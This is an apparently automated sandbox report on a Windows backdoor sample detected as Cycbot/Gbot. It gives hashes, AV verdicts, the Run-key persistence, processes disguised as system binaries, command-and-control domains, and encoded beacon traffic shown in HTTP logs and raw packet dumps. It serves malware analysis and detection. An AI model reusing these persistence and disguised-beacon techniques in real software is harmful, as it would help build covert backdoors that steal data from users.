Analysis Date2014-06-15 02:07:19
MD579729ab1b62d7bf672fd5c66dcce11b6
SHA135cfb37247fdaf5c5edcc5b3f4c69c1041e6736e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: f74699d2a0a61e086e14faba6a0d7b0b sha1: d18a5a1372ded36ffb366f465d31db0e46313f28 size: 163840
Section.rdata md5: 962e3533db743f861429b60d5fd11526 sha1: 342b8dc876dc7b1f20ae171fb54710d54a1867e7 size: 2048
Section.data md5: 50413093db9f992496dc7773ec461b67 sha1: 08c8a082779835856b2508e7cfcd4ac629875538 size: 20992
Section.tls md5: 0e826ea0e20190392e35ef097487f3bb sha1: 4b18e6de486e0c5d58010eb7fd9ad6feae87e8dd size: 512
Timestamp2005-09-16 01:30:15
VersionPrivateBuild: 1141
PEhash7dfc2af3aeb4532a011467c9776a039daac9d2b7
IMPhasha6f7ee916d2974f0decdaadab622e475
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.13020.psa
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Gbot-704
AVDr. WebTrojan.DownLoader2.12947
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KVW
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FO
AVIkarusTrojan-Spy.Win32.Zbot
AVKasperskyBackdoor.Win32.Gbot.zl
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVRisingTrojan.Win32.Generic.128A8B21
AVSophosMal/Sefnit-A
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSstellasystemsonline.com
Winsock DNS127.0.0.1
Winsock DNSgravatar.com
Winsock DNSelworldonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.240
DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSzonetf.com
Type: A
208.73.211.235
DNSzonetf.com
Type: A
208.73.211.199
DNSzonetf.com
Type: A
208.73.211.196
DNSzonetf.com
Type: A
208.73.211.172
DNSzonetf.com
Type: A
208.73.211.152
DNSzonetf.com
Type: A
208.73.211.152
DNSzonetf.com
Type: A
208.73.211.235
DNSzonetf.com
Type: A
208.73.211.199
DNSzonetf.com
Type: A
208.73.211.196
DNSzonetf.com
Type: A
208.73.211.172
DNSelworldonline.com
Type: A
DNSstellasystemsonline.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v74=63&tq=gKZEtzyFisbbjeke72BZX43IVgc9OuGCyiDAbFKgboyvXwiHZSJsgcP071LrWl21TYg1cehu43TodO%2BWGDU1Etf3Zg3hDr4yWlzFNqk4igkOc%2FgSpQK9s0OaYpIo%2BJ0AjTm4Wu7GBrPp9LwErBTMA5GlgYmIvGSojqfVe0Og8h7An6W0zeXqnCugY25J9q6y%2BwIlODFO7JPcDV7qqw%2FfJZuTpKqzQ9VmbvIwNkIXnr1F5jFu3%2BxyPFuF6cfNSIJLjuH%2BEe%2FFoPUDwsdHDQWthPW%2F01BgpS%2Fr92tXb5Sel%2BUeR5s%2F2vXWm9OJ%2Fc509jgMSOiC59prHAddDRYc3ia2HZ%2FrCZuR3ES
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 192.0.80.240:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.235:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.152:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763734   bcfe64067be2?v74
0x00000040 (00064)   3d363326 74713d67 4b5a4574 7a794669   =63&tq=gKZEtzyFi
0x00000050 (00080)   7362626a 656b6537 32425a58 34334956   sbbjeke72BZX43IV
0x00000060 (00096)   6763394f 75474379 69444162 464b6762   gc9OuGCyiDAbFKgb
0x00000070 (00112)   6f797658 7769485a 534a7367 63503037   oyvXwiHZSJsgcP07
0x00000080 (00128)   314c7257 6c323154 59673163 65687534   1LrWl21TYg1cehu4
0x00000090 (00144)   33546f64 4f253242 57474455 31457466   3TodO%2BWGDU1Etf
0x000000a0 (00160)   335a6733 68447234 79576c7a 464e716b   3Zg3hDr4yWlzFNqk
0x000000b0 (00176)   3469676b 4f632532 46675370 514b3973   4igkOc%2FgSpQK9s
0x000000c0 (00192)   304f6159 70496f25 32424a30 416a546d   0OaYpIo%2BJ0AjTm
0x000000d0 (00208)   34577537 47427250 70394c77 45724254   4Wu7GBrPp9LwErBT
0x000000e0 (00224)   4d413547 6c67596d 49764753 6f6a7166   MA5GlgYmIvGSojqf
0x000000f0 (00240)   5665304f 67386837 416e3657 307a6558   Ve0Og8h7An6W0zeX
0x00000100 (00256)   716e4375 67593235 4a397136 79253242   qnCugY25J9q6y%2B
0x00000110 (00272)   77496c4f 44464f37 4a506344 56377171   wIlODFO7JPcDV7qq
0x00000120 (00288)   77253246 664a5a75 54704b71 7a513956   w%2FfJZuTpKqzQ9V
0x00000130 (00304)   6d627649 774e6b49 586e7231 46356a46   mbvIwNkIXnr1F5jF
0x00000140 (00320)   75332532 42787950 46754636 63664e53   u3%2BxyPFuF6cfNS
0x00000150 (00336)   494a4c6a 75482532 42456525 3246466f   IJLjuH%2BEe%2FFo
0x00000160 (00352)   50554477 73644844 51577468 50572532   PUDwsdHDQWthPW%2
0x00000170 (00368)   46303142 67705325 32467239 32745862   F01BgpS%2Fr92tXb
0x00000180 (00384)   3553656c 25324255 65523573 25324632   5Sel%2BUeR5s%2F2
0x00000190 (00400)   7658576d 394f4a25 32466335 30396a67   vXWm9OJ%2Fc509jg
0x000001a0 (00416)   4d534f69 43353970 72484164 64445259   MSOiC59prHAddDRY
0x000001b0 (00432)   63336961 32485a25 32467243 5a755233   c3ia2HZ%2FrCZuR3
0x000001c0 (00448)   45532048 5454502f 312e300d 0a436f6e   ES HTTP/1.0..Con
0x000001d0 (00464)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000001e0 (00480)   486f7374 3a206772 61766174 61722e63   Host: gravatar.c
0x000001f0 (00496)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000200 (00512)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000210 (00528)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a6a 75482532 42456525 3246466f   ...juH%2BEe%2FFo
0x00000160 (00352)   50554477 73644844 51577468 50572532   PUDwsdHDQWthPW%2
0x00000170 (00368)   46303142 67705325 32467239 32745862   F01BgpS%2Fr92tXb
0x00000180 (00384)   3553656c 25324255 65523573 25324632   5Sel%2BUeR5s%2F2
0x00000190 (00400)   7658576d 394f4a25 32466335 30396a67   vXWm9OJ%2Fc509jg
0x000001a0 (00416)   4d534f69 43353970 72484164 64445259   MSOiC59prHAddDRY
0x000001b0 (00432)   63336961 32485a25 32467243 5a755233   c3ia2HZ%2FrCZuR3
0x000001c0 (00448)   45532048 5454502f 312e300d 0a436f6e   ES HTTP/1.0..Con
0x000001d0 (00464)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000001e0 (00480)   486f7374 3a206772 61766174 61722e63   Host: gravatar.c
0x000001f0 (00496)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000200 (00512)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000210 (00528)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6b5825 32425039 68253242 49307344   JkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a32 42456525 3246466f   ose....2BEe%2FFo
0x00000160 (00352)   50554477 73644844 51577468 50572532   PUDwsdHDQWthPW%2
0x00000170 (00368)   46303142 67705325 32467239 32745862   F01BgpS%2Fr92tXb
0x00000180 (00384)   3553656c 25324255 65523573 25324632   5Sel%2BUeR5s%2F2
0x00000190 (00400)   7658576d 394f4a25 32466335 30396a67   vXWm9OJ%2Fc509jg
0x000001a0 (00416)   4d534f69 43353970 72484164 64445259   MSOiC59prHAddDRY
0x000001b0 (00432)   63336961 32485a25 32467243 5a755233   c3ia2HZ%2FrCZuR3
0x000001c0 (00448)   45532048 5454502f 312e300d 0a436f6e   ES HTTP/1.0..Con
0x000001d0 (00464)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000001e0 (00480)   486f7374 3a206772 61766174 61722e63   Host: gravatar.c
0x000001f0 (00496)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000200 (00512)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000210 (00528)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....


Strings
+..`.%.;L..T.
....R..
..B.]...Y.'.Y
j7
.$g
...
.F.....
l[
.C.
..FE.=..>.
.y.4........
.h.]=..0.
.........
<m
\/.{ut..| ..!.l4...)y
).z. 0....R..W.2_GN...
.
.d.
.@.-.
040904b0
1141
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0@9P#K
0k2!<(
4	E%~eL]G
4e+p^q
4k4FNg
~7E*Ak
7X@S8)g
8>h{XR
A &Hk/
bPs409
;)?C,|
CallNextHookEx
cGX3;NH
ChildWindowFromPoint
ClipCursor
COMCTL32.dll
comdlg32.dll
CompareStringW
CreateFiber
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
Dr=yk+
=eG@Ig&
EmptyClipboard
EnumResourceNamesA
	\#[f%
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
f TvSO
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
,@Gt7cxh
%@gURT
@\\[hK3
H:x?l\
I+7*X1
|igwQ0
i`l	Y.!r
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
)`IV.)W
;JKV)5v
JRichu
)jTK(q
`(k$7-9
KERNEL32.dll
Km8*.T
Kw_:h3r
L|<HL^
_)lhT~
LocalAlloc
LockFile
M!$9 d
m|o}*h
<+~^mX,M
N76JhY
NdrClientCall
;No{\`
:*nxM'
[P\[di\
& _&Q$
q7y#=<j
QJGpqr8r6[
`.rdata
RealGetWindowClass
RegisterClassW
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
rU'#`*bO
&'SC'/;
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
TerminateProcess
!This program cannot be run in DOS mode.
TmmKhq
ToAscii
Ujnju&
UnhookWindowsHookEx
UnlockFile
UOMxm0
uQ$"f2
USER32.dll
u-ZINP
,>v7nC
VerLanguageNameW
v{oh'k(X#
-V}}>P
	vu9K~
\vzm<e
W@^!%B
WinHelpW
_wO/Qe
=/x}vU
x?vWZW/
{*<+X/W_
Y.Qyfb
Z~LK_#
ZmoZ/[
z:nzJ(
ZoxKTw~